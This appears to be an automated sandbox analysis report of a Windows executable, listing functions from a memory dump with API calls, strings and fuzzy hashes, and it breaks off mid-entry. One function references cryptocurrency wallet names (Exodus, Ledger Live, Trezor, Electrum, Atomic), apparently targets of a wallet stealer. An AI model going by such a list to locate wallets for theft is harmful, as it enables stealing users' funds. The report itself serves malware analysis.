Function 00007FF7ABC30190 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC30605
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3060B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC30611
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC30617

Strings

' is not a number., xrefs: 00007FF7ABC303B5

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: ' is not a number.
API String ID: 3668304517-698141950
Opcode ID: d1709e9c43e06dfda3d09e045e85fb04cb24677060ca0620f299f26726303a2c
Instruction ID: bf7ed04781e57e89df40a5869afbec54c1a7159362c6a842b87fd51c597036b6
Opcode Fuzzy Hash: d1709e9c43e06dfda3d09e045e85fb04cb24677060ca0620f299f26726303a2c
Instruction Fuzzy Hash: F9D1E223E15B8185EB10EB78D440BADB761FB85798F915236EE5C17ABADF38E180C700

Function 00007FF7ABC35720 Relevance: 8.6, APIs: 2, Strings: 2, Instructions: 1640COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF7ABC36AE7
0123456789ABCDEFabcdef-+XxPp, xrefs: 00007FF7ABC3577C, 00007FF7ABC35D10, 00007FF7ABC35F09, 00007FF7ABC36457

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
API String ID: 593203224-1108341528
Opcode ID: e32337ba36a8eb0fbe8ca116cffde9812e9b36562b8a89774e622353cfab850b
Instruction ID: 227f403d0e01fe674823b36d02eaa52eed72919c6a9320745564a222e330957a
Opcode Fuzzy Hash: e32337ba36a8eb0fbe8ca116cffde9812e9b36562b8a89774e622353cfab850b
Instruction Fuzzy Hash: C9E29F72A0E68189EB55AF2DD05467CF7A1AB01F88FD98131DA5D4B3B5CE3DD84AC320

Function 00007FF7ABC42348 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7ABC423A9
IsDebuggerPresent.KERNEL32 ref: 00007FF7ABC423C1
OutputDebugStringW.KERNEL32 ref: 00007FF7ABC423D2

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7ABC423CB

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
Instruction ID: 04390edf6b84045e986bb1e0b97a2bc7f8ecfed1a2b00a009d5278b0f2c9a31f
Opcode Fuzzy Hash: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
Instruction Fuzzy Hash: CA119132615B42A7F744AB2AD5557B9B2A5FF04345F814134C64D46A70EF7CE4B4C720

Function 00007FF7ABC09830 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

Atomic, xrefs: 00007FF7ABC09924
Exodus, xrefs: 00007FF7ABC09886
Ledger Live, xrefs: 00007FF7ABC098AF
Trezor, xrefs: 00007FF7ABC098D7
Electrum, xrefs: 00007FF7ABC098FE

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: Atomic$Electrum$Exodus$Ledger Live$Trezor
API String ID: 73155330-2331485672
Opcode ID: a8f77f9f309beedd2d7a6fb9237a85cd204fb79b959dea2a03a3b4b8bfaff198
Instruction ID: 3695eaa1591a776c9e1464c07d257697b8c91a78d7f33854e14b10400c152a69
Opcode Fuzzy Hash: a8f77f9f309beedd2d7a6fb9237a85cd204fb79b959dea2a03a3b4b8bfaff198
Instruction Fuzzy Hash: 6371F622F25B9581E700EB79D8416BEA371FB99784F955232EE4C236A5DF7CE580C310

Function 00007FF7ABC34D10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 814COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC36B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC36B9B
Part of subcall function 00007FF7ABC36B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC36BC0
Part of subcall function 00007FF7ABC36B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC36BEA
Part of subcall function 00007FF7ABC36B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC36C7B

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC35712
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC35718

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00007FF7ABC34DA3, 00007FF7ABC35368

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 4156930308-2799312399
Opcode ID: af62c1b18d5b9daf15ef9544174b9f736f5b698215e10a151774bbabdc70e05e
Instruction ID: 4a19ead4508cc95ac15bb882e3d46c66cc322017356e544028bfc884cd733a5f
Opcode Fuzzy Hash: af62c1b18d5b9daf15ef9544174b9f736f5b698215e10a151774bbabdc70e05e
Instruction Fuzzy Hash: 91728372A0A68189EB59AF2DC05477CF7A1AB01F58FDA8131CA5D4B3B5CE2DD849C360

Function 00007FF7ABC43938 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7ABC43964
GetCurrentThreadId.KERNEL32 ref: 00007FF7ABC43972
GetCurrentProcessId.KERNEL32 ref: 00007FF7ABC4397E
QueryPerformanceCounter.KERNEL32 ref: 00007FF7ABC4398E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
Instruction ID: 18a30d573acfc36c7234af747e7d5e48235d9a4497bf2a95da6d4f9f47eb505f
Opcode Fuzzy Hash: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
Instruction Fuzzy Hash: 71118E22B15F018AEB00DFA4E8446B873A4FB59B69F850E35DA2D867B4DF7CD1A48350

Function 00007FF7ABC2F910 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 310COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A68
Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A6E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC2FD57

Strings

Missing ',' or ']' in array declaration, xrefs: 00007FF7ABC2FC2D
in Json::Value::operator[](int index): index cannot be negative, xrefs: 00007FF7ABC2FD70

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
String ID: Missing ',' or ']' in array declaration$in Json::Value::operator[](int index): index cannot be negative
API String ID: 4131450254-2107479676
Opcode ID: 99763ad842c78cf9390237b1c23b241b16f30330d5d1da514ea956af2446be50
Instruction ID: b1a8ba734880608f0237c4a9305013318d84fa70da15408f8403e616854c8464
Opcode Fuzzy Hash: 99763ad842c78cf9390237b1c23b241b16f30330d5d1da514ea956af2446be50
Instruction Fuzzy Hash: BFD1D522A19A4582EA24FB19E460B7EE3A1FB95B84F814131DF8E47BB5DF3CE541C710

Function 00007FF7ABC3DF9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF7ABC02A65), ref: 00007FF7ABC3DFC2
FormatMessageA.KERNEL32 ref: 00007FF7ABC3DFF5

Strings

!x-sys-default-locale, xrefs: 00007FF7ABC3DFB5

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
Instruction ID: 457fce74db1d5fe070670a88170dd8f2125b0dbe8cd713d095bf5ec3ce002d60
Opcode Fuzzy Hash: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
Instruction Fuzzy Hash: 0801D671B0978282E7559B15F440B7AE7A1F788784F858035DA4946AB4CF3CD545CB10

Function 00007FF7ABC50F30 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF7ABC50F96
memcpy_s.LIBCPMT ref: 00007FF7ABC50FC1

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 3a169fb333f111df0ae1304fb82a5a5346c1f6606d896419b7e9c4814cfa7d1e
Instruction ID: 4600a7aa40d42931b19a2f190c05f1cde0a3a7c8d992c8e829e33680c82cc40f
Opcode Fuzzy Hash: 3a169fb333f111df0ae1304fb82a5a5346c1f6606d896419b7e9c4814cfa7d1e
Instruction Fuzzy Hash: 85C1F772B5A68587E724DF1AA088A7EF791F784784F858235DB4B43B64DB3DE900CB40

Function 00007FF7ABC641C8 Relevance: 4.7, APIs: 3, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033

Part of subcall function 00007FF7ABC56F84: FlsSetValue.KERNEL32 ref: 00007FF7ABC56FC9

GetLocaleInfoW.KERNEL32 ref: 00007FF7ABC64234

Part of subcall function 00007FF7ABC5C228: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5C245

GetLocaleInfoW.KERNEL32 ref: 00007FF7ABC6427D

Part of subcall function 00007FF7ABC5C228: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5C29E

GetLocaleInfoW.KERNEL32 ref: 00007FF7ABC64345

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
String ID:
API String ID: 1791019856-0
Opcode ID: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
Instruction ID: 4903def95bdc58d8b48689c75ab991d05a8e46ab88aa18585f442bae9d0eaeb7
Opcode Fuzzy Hash: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
Instruction Fuzzy Hash: C661A372A0A54286EB34AF19D590E7DB3A1FB48745F825235C78D836B1EF3CE451C721

Function 00007FF7ABC58D4C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF7ABC54F9A), ref: 00007FF7ABC58DC0

Strings

GetLocaleInfoEx, xrefs: 00007FF7ABC58D68, 00007FF7ABC58D79

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
Instruction ID: 4ebeb6edeeac92af5dea91f62a31b1d3730f96e99036eb61494a52ca679d6e84
Opcode Fuzzy Hash: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
Instruction Fuzzy Hash: CB01A231B0AA41C6EB40AB5AB4408A6E760EF98BD0F994135DE4D03B75CE3CD5818760

Function 00007FF7ABC28010 Relevance: 3.4, APIs: 2, Instructions: 368COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC282DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC282E7

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: 90368b8ef4441dc009c4228227d5403af90ea720699dd06e338a726c9d3662ce
Instruction ID: 64e246c38ced0a5dfe699b36f42a8e7d305f037847a6184147db1e5b8e5f5ba2
Opcode Fuzzy Hash: 90368b8ef4441dc009c4228227d5403af90ea720699dd06e338a726c9d3662ce
Instruction Fuzzy Hash: 57E10162A1AB8582DA10EF19E044A7DB7A4FB48BD4F968631DF9D077A1DF3CE590C310

Function 00007FF7ABC5FDA0 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF7ABC5FFEF
RaiseException.KERNEL32 ref: 00007FF7ABC60000

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 598787edf748aa6946d53eba35aafe4e57d7d190c1449ce64e1dcf32e842ec3e
Instruction ID: 37bdefdc7bcfa2e3ee4fe40476d965ef6b82e8173f2c67149a7d7c60fba3f0d0
Opcode Fuzzy Hash: 598787edf748aa6946d53eba35aafe4e57d7d190c1449ce64e1dcf32e842ec3e
Instruction Fuzzy Hash: C3B16A73A05B888BEB19DF2DC886768BBE0F744B48F568921DA5D83BB4CB39D451C710

Function 00007FF7ABC386C0 Relevance: 2.8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

Strings

in Json::Value::operator[](ArrayIndex): requires arrayValue, xrefs: 00007FF7ABC389DE
assert json failed, xrefs: 00007FF7ABC38A06, 00007FF7ABC38A23

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID: assert json failed$in Json::Value::operator[](ArrayIndex): requires arrayValue
API String ID: 0-1138025937
Opcode ID: 52495e85efedf8587e9a915e7768b944e264220d975e34df909c3d4f03595598
Instruction ID: b1a07b8173586d76473ee681657ec19ec23e868ab799dfc0e6945c7e147a8f6b
Opcode Fuzzy Hash: 52495e85efedf8587e9a915e7768b944e264220d975e34df909c3d4f03595598
Instruction Fuzzy Hash: C1B11922A1A64182EB24EB29D450ABDF7A1FB84B84FC64135EA8D077B5DF3CD645C720

Function 00007FF7ABC5A65C Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF7ABC5A769
gfff, xrefs: 00007FF7ABC5A7E6

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: d96ac94b998a0613f689ee7d6bdb617a18d6d56d146caa956ea6ba6d0f0f1ef6
Instruction ID: 19a0a10160427237b94e992ab4fb56922556ff4b9c4d461d42d7564c63f436bc
Opcode Fuzzy Hash: d96ac94b998a0613f689ee7d6bdb617a18d6d56d146caa956ea6ba6d0f0f1ef6
Instruction Fuzzy Hash: 3C519822B192C546E7209A3A9840B79BB91F744F94F89C331DB9847AF1CF3DD001C720

Function 00007FF7ABC518B8 Relevance: 1.9, APIs: 1, Instructions: 373COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF7ABC51A00

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 8a1690cc30971e6efb9191808d7aa67a42901d5129d3e5fedda4b9e201d97209
Instruction ID: c1d00680300551032e0fa03f235faf4cdb16b82efb78fc3da88512e2245c16c6
Opcode Fuzzy Hash: 8a1690cc30971e6efb9191808d7aa67a42901d5129d3e5fedda4b9e201d97209
Instruction Fuzzy Hash: 6212AF22A09BC186E751DF2894586FDB7A4FB58748F869335EB9D43662DF38E5C0C310

Function 00007FF7ABC62298 Relevance: 1.8, APIs: 1, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c9ee47428b9f3fc77cdbc732d359fe599224da288ebfa0240364f596aacbc6
Instruction ID: 0dd59ac9a5c79d2d6a142a5e7da5f7abb0cb12331acae2cf17957e1c9c31a3b2
Opcode Fuzzy Hash: c6c9ee47428b9f3fc77cdbc732d359fe599224da288ebfa0240364f596aacbc6
Instruction Fuzzy Hash: 74E19032A05B8186E724EB65E490AFEB7A4FB58788F414631DF8D57B62EF38D245C300

Function 00007FF7ABC36CB0 Relevance: 1.8, APIs: 1, Instructions: 272COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3700D

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 96ecc0f72a9928f91bfa26dde02c3edad72c9396e32cc41e060eeef61ca00714
Instruction ID: 50511da97b77230dc3e6503d33b9c91f41d5f27eddd38bba3119ef6449fb2415
Opcode Fuzzy Hash: 96ecc0f72a9928f91bfa26dde02c3edad72c9396e32cc41e060eeef61ca00714
Instruction Fuzzy Hash: 49A1222260E68186EB28AF29E05077DFBA0EB45B84FD54131DA9E477B5CF3DD448C720

Function 00007FF7ABC6070C Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
